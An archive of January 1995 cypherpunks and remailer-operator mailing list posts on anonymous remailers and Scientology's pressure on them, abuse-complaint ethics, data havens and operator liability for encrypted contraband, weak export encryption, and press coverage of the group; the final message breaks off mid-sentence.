>        PUBLICATIONS, INC.
> 
> FROM:  Lance Cottrell
>        Operator of remailer@nately and mixmaster@nately



My pgp says: Bad signature

Does this message come from Lance Cottrell or from Scientology?


>  I am willing to comply with your request.

Oh. If this is true (is it?) and other remailer operators do the
same, there will be no anonymous criticism of the Thetans any more.
An non-anonymous criticism of this "church" is said to be a thing
of a special kind.


Mmmh,

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Jan 95 14:30:25 PST
To: cypherpunks@toad.com
Subject: US News on Policing Cyberspace
Message-ID: <199501162229.RAA29483@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


US News of January 23 has a cover story on "policing cybersapce", another
drumbeat about "the growing threats to your privacy and property in the
information age." 
 
Not much new for this group except to enjoy another Spielberg gremlin of
Jekyll and Hyde cryptography, fearful remailers, slippery digicash, stolen
services and personal data, smuggling, terrorism, child pornography,
Tennessee BBS, "cybercops" and such. 
 
Featuring the FBI's Kallstrom and Tafoya and FLETC and Financial Fraud
Institute and Clipper and protective wiretaps, with supporting roles for
Kevin Mitnick, Bruce Schneier, Mike Godwin, Marc Rotenberg, John Perry
Barlow, Esther Dyson, Robert Corn-Revere. 
 
And, a cartoon on how to teach parents fear of the Net for their children. 
 
Cypherpunk is not sited, I think, or is it steganoed?.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 17 Jan 95 00:24:16 PST
To: cypherpunks@toad.com
Subject: Scientologys Attempts
Message-ID: <9501161644.AA06046@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



I just had a view into the alt.religion.scientology and
alt.clearing.technology newsgroups. There are some messages
about a Scientology decision to shut down every internet traffic
about Scientology. If the messages are true, Scientology sent 
rmgroup Control messages to remove the groups. 

The request to stop the remailers seems to come from the
same people...

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 16 Jan 95 15:03:29 PST
To: cypherpunks@toad.com
Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd)
Message-ID: <Pine.SOL.3.90.950116175820.28979C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 16 Jan 1995 16:44:07 -0500
From: Craig Peterson <craig@Mainstream.com>
To: Multiple recipients of list <rkba-alert@gatekeeper.nra.org>
Subject: INFO: NBC Nightly News Tonight

A story regarding the Internet, with some sort of mention of NRA.org,
should be on the NBC Nightly News with Tom Brokaw tonight.

Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 16 Jan 95 15:06:59 PST
To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID: <Pine.SUN.3.91.950116180305.15126A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Jan 1995, Robert Rothenberg wrote:

> Date: Sat, 14 Jan 1995 23:45:41 -0500 (EST)
> From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
> To: cypherpunks@toad.com
> Subject: Another problem w/Data Havens...
> 
> 
> I can see a potential problem with Data Havens (as they've been discussed
> here) that may very well inspire the wrath of the authorities more than
> nuclear secrets or dirty pictures of J.Edgar Hoover...
> 
> How does one keep a site from becomming a remote pirated-software exchange
> site? (Esp. since after that MIT case laws may be changed...) It seems that
> such a service could become a magnet for the "elite warez" crowd... and even
> if the operator isn't jailed it could lead to a shutdown of the service.
> 

Properly formatted, a dispersed multijurisdictional data haven can 
effectively say "Who cares" to the entirety of your point.

A data haven that mandates encryption for all incoming data will be 
essentially immune from this sort of problem.  The real measure of 
shutdown will be (on non-privately owned sites) the level of traffic that 
begins to interefere with other functions of the site.

Data havens that can split data to two or more locations in seperate 
jurisdictions can effectively ignore attention from authorities not 
related to the site management or site preformance.  Encryption mandated 
sites can also take this stance, while encryption is legal in any event.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 16 Jan 95 18:23:31 PST
To: Robert Rothenberg <unicorn@access.digex.net>
Subject: Re: Another problem w/Data Havens...
Message-ID: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Data havens that can split data to two or more locations in seperate 
>jurisdictions can effectively ignore attention from authorities not 
>related to the site management or site preformance.  Encryption mandated 
>sites can also take this stance, while encryption is legal in any event.

It just occurred to me when reading this another method for ensuring the
"I can't tell what's in it" condition with a data haven operator.  Why not
use a secret sharing system where the contraband data is split into a number
of pieces and sent to different havens?  It could be argued that the individual
pieces are not the same as the whole, and there is absolutely no way the
operator could recover the original from a given piece (thus providing
plausible deniability.)

Using M by N secret sharing, with M < N, you build in some redundancy in case
one of the havens gets shutdown.

Ok, Eric, go ahead and blast your holes in this argument :)

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxspxk1Diok8GKihAQG4FAQAjCaFOGC+N5zjQ3zVQstv75wxBp/d0js1
2a3ecWdD/S3Sv70l9Y2N4e4vja8Pps4eR1a7Gtzq/nWcHmZXRGRgCzaaHGCNibF5
RaIJUlGGpaKe/UaQ3XfZH2guRBSUCIi4To7QWf3CzpZoWkR4gmZhhB1AcZrd6Z34
WYqZUBwuISI=
=68Mc
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 16:09:41 PST
To: mcip@mcfeeley.cc.utexas.edu
Subject: Announce: ChainMail 0.6b applescript for using anon remailers
Message-ID: <ab40ba9206021004e8c1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


I've written an applescript for using the cypherpunks-style anon remailers
with Eudora for the macintosh.
It will take a message in Eudora, and construct a chain with MacPGP for
encryption, through remailers you've specified, and then deposit it back in
Eudora for sending.
There are still several features I'd like to add to it, but it's quite
useable in it's present incarnation.
You need a scriptable version of MacPGP, scriptable version of Eudora, and
some sundry scripting additions which are listed (with URLs) in the docs.

Send email if you'd like a copy, and I'll mail you a binhex'd copy. I don't
want it on any archive sites yet, because it's not really done, or fully
beta tested for bugs.  (so let that be a warning to you, too.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 16 Jan 95 13:10:55 PST
To: cypherpunks@toad.com
Subject: request for factorising code
Message-ID: <6482.9501161922@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have had a look at the exported version of Netscape's WWW browser
which has support for secure transfer of info, and it says it uses RSA
keys limited to 40 (not sure whether this is decimal digits or bits).
This is the broken version for export, I am not sure what the
non-crippled version uses.  I would like to have a go at factorising a
number of 40 digits to get a feel for how secure this system is.  I
suspect not very secure even 40 digits is pretty pitiful for an RSA
key size 40 bits would be a joke.  

I would like to get a feel for how long it takes to factorise a 40
digit number.  

Does anyone have source code for factorising large numbers.

I have code to generate the RSA key pairs and modulus, what I am
looking for is code to factorise a number using one of the better
algorithms (quadratic sieve, etc.).

Adam

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAiwUXUEAAAEEAJnWEHE3juLAyMnEt3hrID3t8tblJvJPfoPz4Plg+2a5y4HA
TonXBomkhm8hrRu1umruUUaeW1mxIbpvP413a2JyU7pdyfyoFVpWW5iT9pXYOgSW
65d+5GWe4g4PLrSbJZPBFIezd8xddnx5+5hbRk1K6UpfReQuOynIuJ1VakpnAAUT
tB9BZGFtIEJhY2sgPEEuQmFja0BleGV0ZXIuYWMudWs+
=pRe7
-----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUALxrGhSnIuJ1VakpnAQHzbAP/Q00RZan2rdMrIYzM3Dp4+620DFGoe0zi
bRMvLUlKUuPPfdc5PYh/l7cxXwnj6/ARP6QUCyxlHwS/vKxHNJyhIcgna2yIBQGA
NtCKZjZNdEYII9/taC4BXc7nTIvJKuz0EgXVSJwbUXgBjuMFA/ZGOrKr1SFcyLbP
qMER2rgg5VM=
=AJwi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 16 Jan 95 16:48:08 PST
To: aba@atlas.ex.ac.uk
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950116194240.21082A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995 aba@atlas.ex.ac.uk wrote:

> I have code to generate the RSA key pairs and modulus, what I am
> looking for is code to factorise a number using one of the better
> algorithms (quadratic sieve, etc.).

	It's been established that the encryption in Netscape is 40 bit 
RC4, not 40 bit RSA, but if anyone's still looking for the quadratic 
sieve code, look on Derek Atkins' ftp site toxicwaste.mit.edu. Arjen 
Lenstra may have made the large number field sieve (LNFS) code available 
somewhere, but I'm not sure.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Mon, 16 Jan 95 19:46:38 PST
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Another internet story: INFO: NBC Nightly News Tonight (fwd)
Message-ID: <ab40edc2000210030d59@[144.37.6.103]>
MIME-Version: 1.0
Content-Type: text/plain


>A story regarding the Internet, with some sort of mention of NRA.org,
>should be on the NBC Nightly News with Tom Brokaw tonight.
>
It did not play out here on the left bank, probably because of the
earthquake in Japan. Maybe tomorrow.

-- Marshall






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 17:27:38 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Abuse Complaint out of homer@rahul.net
Message-ID: <Pine.SUN.3.91.950116201426.6889A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Oh, Goody.  I get to deal with my first abuse complaint for my
remailer. 
 
     Seems to me that letting others decide what is or is not abuse
without at least being able to see the abuse myself would be wrong, that
opens the door to just anyone claiming they were abused and my taking
action against the alleged abuser. 
 
     Clearly though if some admin of a system considers something an
abuse, one can not just blow them off, we are all responsible for
responsible use of the net. 
 
     Even if this posting came through a chain, this admin is going to try
to trace back the chain through the other remailers.  So if I give him
the remailer it came from, he is going to pester that remailer operator
who won't appreciate it. 
 
     I will soon be able to install blocking on the To: or From: lines.
Blocking the From lines is hard, because usually abuse comes through other
remailers, so I can't just block that.  I can however block To: lines if
the person is abusing one particular usenet newsgroup or end receiver. 
 
     It would seem that if I am going to take action against someone with
blocking of some sort, then I have at least a right to see the full
posting that is claimed to be abusive. 
 
     By the way, rahul.net keeps syslog files world readable which I find
to be a security leak, as anyone (specifically the Church of Scientology)
could find out who is in communication with me and start to harrass them
too. 

     Comments on ethics and diplomatic handling of this would be
appreciated. 
 
     Homer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Jan 95 18:17:57 PST
To: cypherpunks@toad.com
Subject: Economist on EFF
Message-ID: <199501170217.VAA29809@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Economist of January 14-20 washes EFF's dirty laundry. 
 
 
After recounting Berman's boot and EFF droop, the article concludes:  "That
leaves cyberspace's radical libertarians without a voice in Washington. 
They're probably delighted." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 18:22:11 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Abuse and Remailer Ethics
Message-ID: <Pine.SUN.3.91.950116205019.7181A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     I am surprised there isn't a widely agreed upon codification of
remailer operator ethics for handling abuse cases.

     Perhaps there is, and I would appreciate someone pointing me to it.

     I am not presently on cypherpunks, so please include me in the
replies.
 
     Here is the situation.

     homer@rahul.net runs with header logging on, it contains, From: 
To:, Date: and Subject.  rahul.net also keeps syslog files for a week,
and makes them public to those on rahul.net.
 
     B writes me saying he is the 'admin of a listserv' and complains that
someone is abusing his list with postings through my remailer. He wants
the name and e-mail of the abuser to 'talk to him personally'. 
 
     Clearly I should not give out the name of a remailer user (if I know
it) unless ordered to by a court order. 
 
     Thus his request is, on the surface of it, absurd.
 
     In this case the alleged abuser, A, did not chain his posting so
my logs clearly show who it is.  Clearly I am always going to know the
To: of an abuse because the complaint comes to me from or about that
address.  If the abuser only uses one remailer, then I am clearly
going to know the From: line also, as it is right there in the header
logs or rahul.net syslog files (same thing.)
 
     If the abuser chains and a complaint comes to me, all I will know
about the From: line is that it came from another remailer.  However
now that I know his name and e-mail, if I get another complaint about
him, and he has wised up and started chaining, I could pass his name
onto the prior remailer before mine, and that remailer could do the
same, until it came back to the first remailer on the chain who could
take action.  This however would piss off a lot of remailer operators.
 
     But now what action is appropriate?
 
     Well giving A's name to B is out of the question without a court
order, right?
 
     Blocking the To: line, namely the abused party, is extreme as
that blocks others from posting to that list or group, unless the list
or the group wishes to have no anon messages.  In which case I
probably might consider blocking the end recipient.
 
     Blocking the From: line, will stop all further postings from that
person, which is fitting if indeed he is 'abusing' people, but he will
merely start posting through other remailers, who will then have to go
through the same procedure.  Perhaps there is some justification then for
remailer operators sharing blocked From: lines with each other, that
might be a good idea.
 
     But who is to decide what is or is not abuse?  Surely I can't let
others tell me that they have been abused without even reading the
message, I have seen it happen all to often that parties claim they
are being abused when they are merely being exposed and rightly so.

     On the other hand, since I am responsible for my own little
corner of the net, if something happens that I consider abuse, I
certainly have a right to put an end to it if I can.

     Some questions:
 
     Does any single recipient have the right to demand that they be
blocked from all anon messages.  I would say yes.

     How about demanding blocking anon messages only from some
senders?  That is harder to implement.  If you block the sender, you
block ALL his postings, not just to that party.  So you would need to
block specific From: and To: combinations.  This would not work with
chaining at all, even if we did share blocking information.  So that
is out.

     Does a list owner have the right to demand blocking to his list,
with or without a vote of the list readers?  I would say yes.
     
     What about a newsgroup?  I would say it takes a vote.  Are anon voites
allowed?  Touchy question that was important at one time on 
alt.r.scientology.
 
     Anyhow I would guess that the correct action here is to write the
offender and let him know a complaint has been registered against him.
I would also educate him as to why he was so easily traced and tell
him that if he wants to avoid such in the future to start chaining.

     However if he is a determined abuser not prone to social
embarassment, then the sharing of blocking among remailer operators
might become a very good idea.

     I don't know how you seasoned reops feel about abuse, jpunix went
out of business for want of an effective way to deal with it.  I think
part of the answer is in close cooperation.  This might help keep the
abuse down, and raise the reputation of reops so that people begin to
think of us as responsible service providers rather than anarcho
terrorists.

     However I am very new to this field, so I may have my head stuck
up my ass, and I would like to hear back from you on your ideas.

     Homer Wilson Smith
     homer@rahul.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller@metronet.com (Michael L. Acklin)
Date: Mon, 16 Jan 95 19:53:27 PST
To: Homer Wilson Smith <Remailer-Operators@c2.org>
Subject: Re: Abuse Complaint out of homer@rahul.net
In-Reply-To: <Pine.SUN.3.91.950116201426.6889A-100000@math>
Message-ID: <0hp6lS$TgAh4077yn@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Homer,
     I am going to have to agree with you on this. A Sysadmin would have
to see the messages or data that is suppose be harassing the
complaintant. What I say is harassment may be different from what you
say it is.


Michael L. Acklin    ------------>hroller@metronet.com
Finger for Pub Key
or MIT Key Server
PGP Fingerprint: 86 D6 52 87 E4 FD 64  05 63 BA CA AA B8 A9 04




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 19:25:58 PST
To: Homer Wilson Smith <Remailer-Operators@c2.org>
Subject: Re: Abuse and Remailer Ethics
Message-ID: <ab40e69a010210049530@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 01/16/95, Homer Wilson Smith wrote:
[snip]
>     Does any single recipient have the right to demand that they be
>blocked from all anon messages.  I would say yes.
>
>     How about demanding blocking anon messages only from some
>senders?  That is harder to implement.  If you block the sender, you
>block ALL his postings, not just to that party.  So you would need to
>block specific From: and To: combinations.  This would not work with
>chaining at all, even if we did share blocking information.  So that
>is out.
>
>     Does a list owner have the right to demand blocking to his list,
>with or without a vote of the list readers?  I would say yes.
>
>     What about a newsgroup?  I would say it takes a vote.  Are anon voites
>allowed?  Touchy question that was important at one time on
>alt.r.scientology.

I agree  with all of that.  Somewhat conditionally with what you say about
newsgroups, because while it sounds nice, it would be hard to implement.
I'm tempted to say that a newsgroup, by it's nature, doesn't have any
mechanism for control/government, once created.  And as such, doesn't have
any way to "decide" not to accept anonymous posts, or posts from a specific
user or remailer.  So I'm tempted to say "tough luck" to newsgroups that
don't like receiving anonymous posts. The alternative is for people
interested to create a moderated newsgroup, where of course the moderator
could refuse to allow anonymosu posts with or without the remailer
operators cooperation.

>     Anyhow I would guess that the correct action here is to write the
>offender and let him know a complaint has been registered against him.
>I would also educate him as to why he was so easily traced and tell
>him that if he wants to avoid such in the future to start chaining.

Yes, I think that is an excellent course of action.

>     However if he is a determined abuser not prone to social
>embarassment, then the sharing of blocking among remailer operators
>might become a very good idea.

I'm not so sure about that.   It might become neccesary, but blocking
remailer delivery to a particular address is a _much_ more desirable
solution, in my opinion.  If a particular person doesn't want to receive
anonymous mail, fine.  And it might be good to have a mechanism by which he
could make those desires known to all remailers, so he doesn't have to do
it individually.  But if he does want to receive mail from the remailers, I
think he's got to receive all mail from the remailers, and not count on the
remailer operators to play Identity Detective and try to screen out people
he doesn't like.  Same with a listserv and the requests of the listserv
operator.  A newsgroup is, of course, more touchy, because there really
_isn't_ a way for "the newsgroup" to decide not to accept anonymous posts.
And I'm not really sure there should be.

Part of the answer relies on how "independent" your remailer is.  If you
_were_ to take no action at all to people who complain about "abuse", would
you get in trouble? (from school, company, service provider, country). If
you would, then you've got to decide if you are willing to take the heat.
And your probably not willing to take the heat for Cantor & Siegel to spam
the net.  So you've got to do what you've got to do.  But, personally, if I
ran a remailer on a machine that wasn't subject to political pressure (from
school, service provider, whatever), I would never make any effort to
cooperate with other operators to track down "offenders", and I'd never
exclude any newsgroups from delivery.   Because I wouldn't want to play
censor and decide what "offense" is worth tracking down, and what isn't.
And because even having the _capability_ to track down people is really
dangerous, when you get pressure to track down someone you _don't_ want to
track down.  Much better to say "Can't be done, don't have logs, can't
figure out who it was," then to have to admit "well, I've tracked down 5
people in the past month cause someone complained about them."  Kind of
ruins the point of anon remailers. Best would be to have tracking down be
impossible, and it would be close to, if not entirely, impossible if the
user took the proper precauations.  But even if it's possible, it's
probably best not to develop a mechanism to do it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 16 Jan 95 19:43:46 PST
To: Johnathan Corgan <jcorgan@scruznet.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.SUN.3.91.950116223900.25130A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995, Johnathan Corgan wrote:

> It just occurred to me when reading this another method for ensuring the
> "I can't tell what's in it" condition with a data haven operator.  Why not
> use a secret sharing system where the contraband data is split into a number
> of pieces and sent to different havens?

	Damn it, you beat me to it. :-)

[ ... ] 
> Ok, Eric, go ahead and blast your holes in this argument :)

	I'm not Eric, but hey.

	This entire discussion is completely unnecessary. There are ways 
of removing operator liability without examining the submission at all.

----------
	unix3.netaxs.com:/home/grendel 1/511> host bermuda-gw.alter.net
	bermuda-gw.alter.net has address 137.39.234.130
	bermuda-gw.alter.net mail is handled by relay2.UU.NET
	bermuda-gw.alter.net mail is handled by relay1.UU.NET
	unix3.netaxs.com:/home/grendel 1/512> 
----------

	Nicht wahr?

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 20:12:21 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <ab40e69a010210049530@[132.162.201.201]>
Message-ID: <Pine.SUN.3.91.950116230848.8436A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     OK, I understood all this.  I am afraid that if we implement a total
no tracing scenario, then remailers will come under heat from the world at
large and the governments.  Maybe not.  Rright now, Rahul (a good guy) is
implementing syslogs whether I want him to or not, and that isn't about to
change.  Really I would have to be the owner of my own system in order to
do what you are suggesting. 

     But then that is what got jpunix shut down. No way to deal with
complaints, and big time abuses going through his server, right JP? 

     But I see the advantage to total no tracing, I am just not sure
all of us are really strong enough yet to implement it and stay
in business.
 
     Homer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 20:36:44 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Remailer Abuse (fwd)
Message-ID: <Pine.SUN.3.91.950116233334.8718B-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Here is the message I sent to both the complainant and the complainee.

     Homer


     Dear ..... ,
 
     I have been contacted by someone complaining about a posting you made
through my remailer.  They want me to tell them who you are, which ain't
going to happen, but at the same time I don't like getting complaints, you
understand? 

     Of course I can not tell you who complained any more than I can tell
them who you are.  But you know where you have been posting using my
remailer, right? 
 
     Now I have no idea if what you posted was really abusive or not,
I did not see the posting or postings, and I know a lot of people complain
about 'abuse' when really its just their closed minds being opened up.
 
     I was able to 'trace' you because you sent something through my
remailer without using chaining.  If you had chained I would never know
who the posting came from.  I was told who it went too and the time, and
its right there in my system's syslogs coming from you.  If you chain and
use PGP, then I could not have traced you.  So read the instructions on
chaining and make sure you USE it.  You will be a lot safer in the future
from complaint attempts than if you don't use chaining. 
 
     If you have questions on how to chain, ask on alt.privacy.anon-server
or read the various helps at many of the remailers.

     I have reposted this letter to alt.privacy.anon-server without your
name and sent a copy to the complainant.

     I expect not to hear anything more about you, ok?

     Homer Wilson Smith
     System Adminstrator of Remailer at
     homer@rahul.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marko@millcomm.com (Mark Oeltjenbruns)
Date: Mon, 16 Jan 95 21:40:34 PST
To: eric@remailer.net (Eric Hughes)
Subject: Does encrypted equal safe?
Message-ID: <m0rU6g1-000kfxC@mill2.millcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>   At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:

        Edited from response on the 'How do I know if its encrypted?' thread
to get some points in the clear.

>If you can't read it, it's not kiddie-porn *for you*, although it
>might be for someone with the key.
>
        So the fact that its not kiddie-porn *for me* makes it safe *for me*
to be transporting or storing for others that know it is kiddie-porn?

>Encryption fragments meaning subjectively.  A magazine, for example,
>has a fixed center of meaning for all who can read the language.  A
>magazine looks the same to all who look at it.  An encrypted file
>looks different to those who have the key from those who do not.
>
        But why does the meaning of the data assume to change?  If I take my
stack of kiddie-porn and put it in a box with a big strong lock on it, in a
way physically encrypting it, change the meaning of what I have?  I now have
a locked box that looks different from my original.

>Encrypted data is fundamentally different from paper-and-ink data in
>this way.  The metaphor of "planting it on somebody" does not apply to
>data that the "somebody" can't read.

        It is fundamentally a different process, but does that make it
different from the locking the physical data in a box as above?
>
>[...] If you can't easily read it, you
>can't be expected to have read it.  The operator of a data service has
>_zero_ motivation to cryptanalyze something.  If they happen to apply
>a viewer to the file (for whatever reason), they don't _want_ to see
>what's inside.
>

        It seems to me that what you are saying is that because the data is
in a form that I can't understand, I'm safe from trouble.  Now it seems to
me that this is not all that different from changing the form or appearence
of physical data and saying I'm not responsible for it.  
        Now think of a remailer:  If somebody gave me this box of stuff,
stuff that I had no idea of what it was since it was *locked up*, to
transport over to location X and I got busted half way there am I safe?
Would the argument that I didn't know what it was hold up?  I would tend to
say no.  If the answer was yes, which is what some current arrguments seem
to indicate, what does that say about responsibility towards spamming or
remailing illegal data?  Can I say that even though someone is using me to
spam or distribute kiddie porn, I have no reason to try and stop it since I
don't know what they are doing?  If I did take it upon myself to stop the
abuse wouldn't I need to analyize the incomming data to stop it?  Something
I'm not supposed to do.
        A Data Haven:  It is illegal to handle certain items in the physical
world.  I can get in some trouble if I have kiddie porn or drugs or what not
in my possesion.  This is true, for most things I would guess, even if I was
just 'holding it for someone else.'  After all, how do I prove that somebody
else put illegal articles, encrypted or not, on my 'site' and it didn't
atually come from me?  Does 'holding it for someone else' type arguments
work in net.world better than in the physical world?  Once again, current
arguments would say yes, it is different and I'm safe to hold onto illegal
data since I don't know what it is.
        Lets see if I got this straight.  In my own words, I'm just as
responsible for the data I massage as the person I'm doing it for judging by
real world parellels, encrypted or not.  Now I would hope this is not the
case, since being a remailer operator would mean that if somebody starts a
spam using my site I would be just as responsible as the person that started
it.  Having kiddie porn on my DH would be illegal even if I had no idea it
was present.  This doesn't sound to good, since many of the uses of my
services would be restricted if I wanted to stay 'safe.'  After all if I
wasn't as responsible for the spam and was safe from harm, or guilt, about
what people used my site for I wouldn't care what went through my system,
I'm not really supposed to care what people send me right?  In fact I may
even take pride that my system is being used so much. ;-)  But this doesn't
seem to be the case, nor in some regards would I hope them to be.
        Now I'm getting confused.  There seems to be some contradictions in
some of the above that need to be worked out, or at least explained to me.
Some pretty serious legal problems seem to be lurking with in.  It just
doesn't seem as cut and dry to me as the argument that if I don't know what
it is I don't have to worry about it.  I'm sure others will have some
comments to help me sort this out.

-Mark
----------
Mark Oeltjenbruns  marko@Millcomm.com   N0CCQ
SnipIt Research    Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 16 Jan 95 22:23:57 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <Pine.3.89.9501170010.A11119-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995, Perry E. Metzger wrote:

> 
> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know there
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...
>
Uhm, this is funny 8)

Jude is the patron saint of a losing battle, the one to keep the Internet 
free, and to fuck with media as much as possible when it brings fun.  And 
the gravy whick dominatrix, all rolled into a few.

she's also a freind so watch it punk 8)
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 17 Jan 95 00:53:03 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com>
Message-ID: <m0rU9dt-0004JdC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Anyway, many of the folks "Wired" and the other hype-zines interview
> are indeed strange and marginal. To be expected. There are only so
> many of the standard "talking heads" that can be interviewed (the
> stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.).
> 
> Frankly, I'd rather see a story on "Zippies," about which I'd heard
> nothing substantive before, than Yet Another Ted Nelson Story, about
> which I've heard entirely too much over the past decade. (Not to
> insult Ted--Hi, Ted!--but there are only so many ways to tell the
> Xanadu story...time for new approaches.)
> 
> I know some folks in the crypto/PGP community who were quite miffed
> that such "marginal" folks as Eric Hughes, John Gilmore, and I were
> featured on the cover of "Wired" 1.2 two years ago...they naturally
> saw themselves as being more worthy, as perhaps they were....such is
> life. The "credit assignment problem" in evolution and genetic
> programming remains a tough one.

I'm not sure that that's the case. Just because you move in dramatically
politically incorrect circles (no insult intended) you may tend to get
interviewed more than, say, I would.  The fact that I might be working on
more important or interesting things is completely irrelevent. 
Cypherpunks is 'hot', so the press goes to who are perceived to be the
'movers and shakers' and they are talked to. The people working behind the
scenes on stuff often are ignored in deference to those who are more
visible.  Again, no insult intended, but I think there's a large measure
of truth in it.  The same people keep getting the press while the larger
bulk of the population gets ignored.  It's also geographically-oriented, 
too - the folks on the West Coast tend to get the majority of the press, 
followed by the East Coast.  Anyone in between is basically ignored.  I 
guess the press thinks that no one outside of Silicon Valley or Boston is 
working on anything of any substance.  Hell, look at Linux - that was 
done by a guy in Finland, and a college student at that.  I'll bet that's 
